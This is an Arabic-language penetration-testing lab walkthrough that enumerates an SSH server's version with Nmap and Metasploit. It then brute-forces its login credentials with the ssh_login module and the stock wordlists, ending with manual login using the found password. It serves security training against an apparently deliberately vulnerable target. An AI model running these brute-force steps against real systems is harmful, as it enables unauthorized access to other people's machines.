🧪 المختبر العملي 8: تعداد SSH (SSH Login Lab)

🎯 الهدف الأساسي: تعداد معلومات خادم SSH مستهدف، بما في ذلك إصداره، ومحاولة تخمين بيانات الاعتماد (Brute-Force) لتسجيل الدخول، باستخدام وحدات Metasploit المساعدة .

🔧 الأدوات المستخدمة:

  • Nmap: لاكتشاف خدمة SSH وتحديد إصدارها.

  • MSFconsole: واجهة Metasploit الرئيسية.

  • الوحدات المساعدة (Auxiliary Modules):

    • scanner/ssh/ssh_version: لتحديد إصدار SSH.

    • scanner/ssh/ssh_login: لتخمين كلمات المرور (Brute-Force).

  • ملفات القوائم (Wordlists): لتوفير قائمة بأسماء المستخدمين وكلمات المرور المحتملة.

📜 خطوات التنفيذ:

📊 مرحلة جمع المعلومات (Information Gathering): تعداد الخدمات وبيانات الاعتماد

  1. 🚀 بدء تشغيل MSFconsole وتحديد عنوان IP للهدف:

    • ابدأ msfconsole:

      msfconsole -q
    • حدد عنوان IP للهدف .

  2. 💡 تعداد إصدار خدمة SSH باستخدام Nmap:

    • 🔧 فحص Nmap لإصدار الخدمة:

      nmap -sV -p 22 [Target_IP_Address]
    • إذا نفذت هذا الأمر، ستُظهر لك النتائج أن خدمة SSH تعمل على المنفذ 22، والإصدار (مثلاً: OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)).

    • 🔗 ربط سلسلة الأدوات: معرفة إصدار SSH مهمة لتحديد الثغرات المعروفة المرتبطة به.

  3. 💡 تعداد إصدار خدمة SSH باستخدام وحدة scanner/ssh/ssh_version في Metasploit:

    • 🔑 استخدام الوحدة:

      use auxiliary/scanner/ssh/ssh_version
    • ⚙️ تعيين الخيارات:

      show options
      set RHOSTS [Target_IP_Address]
    • 🚀 تشغيل التعداد:

      run # أو exploit
    • إذا نفذت هذا الأمر، ستقوم الوحدة بتحديد وعرض إصدار خدمة SSH (مثلاً: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8).

  4. 💡 إجراء هجوم تخمين (Brute-Force) على بيانات اعتماد SSH باستخدام ssh_login:

    • 🔧 الرجوع واستخدام الوحدة:

      back
      use auxiliary/scanner/ssh/ssh_login
    • ⚙️ تعيين الخيارات:

      show options
      set RHOSTS [Target_IP_Address]
      set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
      set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
      set STOP_ON_SUCCESS true # لإيقاف التخمين عند العثور على بيانات اعتماد صحيحة
    • 🚀 تشغيل التخمين:

      run
    • إذا نفذت هذا الأمر، ستبدأ الوحدة بمحاولة تسجيل الدخول وستعرض أي بيانات اعتماد صحيحة تم العثور عليها (مثال: msfadmin:msfadmin).

نقاط التحقق:

  • يجب تحديد إصدار SSH باستخدام Nmap و Metasploit .

  • يجب اكتشاف اسم مستخدم وكلمة مرور صالحين عبر التخمين.

  • يمكنك محاولة تسجيل الدخول يدويًا باستخدام ssh [username]@[Target_IP_Address] للتحقق من بيانات الاعتماد .

Last updated